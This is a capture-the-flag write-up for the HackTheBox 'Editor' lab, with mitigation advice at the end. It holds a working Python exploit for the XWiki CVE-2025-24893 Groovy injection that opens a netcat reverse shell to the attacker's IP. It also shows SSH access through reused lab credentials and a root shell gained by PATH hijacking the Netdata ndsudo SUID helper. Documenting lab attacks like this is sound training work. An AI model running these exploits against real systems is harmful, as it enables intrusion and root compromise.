Editor
Writeup for HackTheBox Editor machine
Executive Summary
This report details the security assessment of the HackTheBox machine “Editor” (medium-difficulty, Linux). The attack chain is as follows:
- CVE-2025-24893 → RCE — XWiki instance on
wiki.editor.htbis vulnerable to a Groovy template injection via the Solr Search parameter. Inject a reverse shell payload within async/groovy macro tags. Reverse shell asxwiki. - Hibernate Config → Credential Reuse — In
hibernate.cfg.xml, find MySQL credentialsxwiki:theEd1t0rTeam99. Reuse for SSH asoliver. - ndsudo PATH Hijacking → Root —
oliveris in thenetdatagroup, which can execute SUID binaryndsudo. It runsmegaclifrom$PATHas root. Create a maliciousmegacliin/tmp, prepend to$PATH, and invokendsudo megacli-disk-infoto spawn a root shell.
Reconnaissance
We initiate our target analysis (IP: 10.129.81.217) by executing a two-stage port scan:
1
2
3
4
5
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ nmap -A -p $port $IP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 01:30 EDT
Nmap scan report for wiki.editor.htb (10.129.81.217)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-title: XWiki - Main - Intro
|_Requested resource was http://wiki.editor.htb/xwiki/bin/view/Main/
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
| http-webdav-scan:
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| Server Date: Sun, 03 Aug 2025 05:30:38 GMT
| Server Type: nginx/1.18.0 (Ubuntu)
|_ WebDAV type: Unknown
8080/tcp open http Jetty 10.0.20
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-webdav-scan:
| Server Type: Jetty(10.0.20)
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://wiki.editor.htb:8080/xwiki/bin/view/Main/
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: Host: wiki.editor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 201.63 ms 10.10.14.1
2 201.59 ms wiki.editor.htb (10.129.81.217)
We map the target host IP to the domain:
1
2
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ echo "10.129.81.217 editor.htb" | sudo tee -a /etc/hosts
Web Application Enumeration
We access the web application on port 80: http://editor.htb/
We access the application on port 8080: http://editor.htb:8080/xwiki/bin/view/Main/
Clicking the documentation links redirects to wiki.editor.htb.
Exploitation: XWiki RCE
The XWiki instance is vulnerable to a critical Remote Code Execution vulnerability. For details, refer to the XWiki Platform RCE Exploit.
We write a Python script that injects a Groovy code block into the text parameter of the SolrSearch route, executing a busybox netcat reverse shell payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests
import urllib.parse
# Reverse shell settings
LHOST = "10.10.14.56" # Change to your IP
LPORT = "1338" # Change if needed
def exploit(target_url):
if not target_url.startswith("http"):
target_url = "http://" + target_url
# Payload using Groovy to execute a reverse shell using busybox + nc
cmd = f"busybox nc {LHOST} {LPORT} -e /bin/sh"
groovy_payload = f'println("{cmd}".execute())'
encoded_payload = urllib.parse.quote(
"}}}{{async async=false}}{{groovy}}" + groovy_payload + "{{/groovy}}{{/async}}"
)
exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text={encoded_payload}"
print(f"[+] Sending payload to: {exploit_url}")
try:
requests.get(exploit_url, timeout=10)
print("[✔] Exploit sent. Check your netcat listener!")
except requests.exceptions.RequestException as e:
print(f"[✖] Request failed: {e}")
if __name__ == "__main__":
print("=" * 60)
print("XWiki RCE Exploit (CVE-2025-24893) - Reverse Shell Trigger")
print("Author: Modified by You")
print("=" * 60)
url = input("[?] Enter target URL (e.g., http://editor.htb): ").strip()
exploit(url)
We verify the redirection behavior of the target endpoints:
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ curl -I http://wiki.editor.htb
HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Location: http://wiki.editor.htb/xwiki
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ curl -I http://editor.htb:8080
HTTP/1.1 302 Found
Location: http://editor.htb:8080/xwiki
Server: Jetty(10.0.20)
We execute our exploit script and supply the XWiki target URL:
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ python3 xwiki_rce.py
============================================================
XWiki RCE Exploit (CVE-2025-24893) - Reverse Shell Trigger
Author: Modified by You
============================================================
[?] Enter target URL (e.g., http://editor.htb): http://wiki.editor.htb/xwiki
[+] Sending payload to: http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22busybox%20nc%2010.10.14.56%201338%20-e%20/bin/sh%22.execute%28%29%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[✔] Exploit sent. Check your netcat listener!
Our Netcat listener catches the shell connection, providing a shell as xwiki:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.56] from (UNKNOWN) [10.129.81.217] 57894
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
We upgrade our shell to an interactive tty session:
1
2
3
4
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ Ctrl + z
$ stty raw -echo; fg
$ export TERM=xterm
1
2
3
4
5
6
xwiki@editor:/usr/lib/xwiki-jetty$ ls
jetty start.d start_xwiki_debug.bat start_xwiki.sh stop_xwiki.sh
logs start_xwiki.bat start_xwiki_debug.sh stop_xwiki.bat webapps
xwiki@editor:/usr/lib/xwiki-jetty$ cd webapps/
xwiki@editor:/usr/lib/xwiki-jetty/webapps$ ls
root xwiki
Lateral Movement to User oliver
We search the application files and locate the Hibernate configuration file hibernate.cfg.xml in /usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF:
1
2
3
4
5
6
7
8
xwiki@editor:/usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF$ cat hibernate.cfg.xml
<?xml version="1.0" encoding="UTF-8"?>
...
<property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&connectionTimeZone=LOCAL&allowPublicKeyRetrieval=true</property>
<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
<property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
...
The configuration exposes the following MySQL credentials:
- Username:
xwiki - Password:
theEd1t0rTeam99
We check the system’s home directory and find the user oliver:
1
2
3
4
5
xwiki@editor:/home$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Jul 8 08:34 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
drwxr-x--- 3 oliver oliver 4096 Jul 8 08:34 oliver
We test these credentials for SSH password reuse:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ ssh oliver@editor.htb
oliver@editor.htb's password: theEd1t0rTeam99
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
...
oliver@editor:~$ cat user.txt
7528fe9afc1c840744ac6d9c0f983629
The authentication succeeds, granting user access.
Privilege Escalation
We search the target system for SUID-privileged files:
1
2
3
4
5
6
7
8
9
10
oliver@editor:~$ find / -perm -4000 -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
...
We locate a custom SUID binary /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo belonging to the Netdata monitoring suite. For security details, refer to the Netdata ndsudo Advisory.
We check the permissions on the binary and verify our group membership:
1
2
3
4
5
oliver@editor:~$ ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 200576 Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
oliver@editor:~$ groups
oliver netdata
The binary is owned by root, has the SUID bit set, and is executable by members of the netdata group.
We run ndsudo with the --help flag to see allowed helper scripts:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
...
The following commands are supported:
- Command : nvme-list
Executables: nvme
Parameters : list --output-format=json
- Command : megacli-disk-info
Executables: megacli MegaCli
Parameters : -LDPDInfo -aAll -NoLog
...
The program searches for executables in the system path.
The program documentation notes that the binary searches for diagnostic executables (such as megacli or MegaCli associated with megacli-disk-info) inside the system’s $PATH variable.
PATH Hijacking Exploitation
Because ndsudo evaluates executables using the executing user’s $PATH variable and runs them as root, we can execute a path hijacking attack by writing a custom wrapper script.
We write a C script that elevates the process UID and spawns a bash shell:
megacli.c
1
2
3
4
5
6
7
8
9
#include <unistd.h>
#include <stdlib.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", "-i", NULL);
return 0;
}
We compile it locally and transfer it to the target:
1
2
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ gcc megacli.c -o megacli
On the target host, we move the compiled binary to /tmp/ and make it executable:
1
2
3
oliver@editor:~$ wget http://10.10.14.56/megacli
oliver@editor:~$ mv megacli /tmp/
oliver@editor:~$ chmod +x /tmp/megacli
We prepend /tmp to our $PATH variable and invoke ndsudo:
1
2
3
4
oliver@editor:~$ export PATH=/tmp:$PATH
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root)
The path hijack executes, spawning a root shell. We read the root flag (root.txt):
1
2
3
root@editor:/home/oliver# cd /root
root@editor:/root# cat root.txt
464b17567d6da73f795667cf8ae2ba04
Mitigations & Security Recommendations
To secure the host, the following actions are recommended:
- Remediate XWiki Template Injection Vulnerabilities:
- Update the XWiki application to the latest version to patch CVE-2025-24893.
- Restrict script execution privileges inside the wiki portal. Sandbox or disable groovy and python script templates for non-administrative portal users.
- Implement Secure Password Management:
- Do not reuse passwords across multiple systems or roles. Enforce unique passwords for application database connections, service daemons, and system administrators.
- Secure SUID Program Paths:
- Harden SUID wrapper binaries (such as
ndsudo). SUID wrappers must avoid searching for executables using the user-defined$PATHenvironment variable. - Enforce a hardcoded, secure search path (e.g.,
/usr/bin:/bin:/usr/sbin:/sbin) inside SUID binaries to prevent path hijacking. - Audit SUID binary execution wrappers regularly.
- Harden SUID wrapper binaries (such as


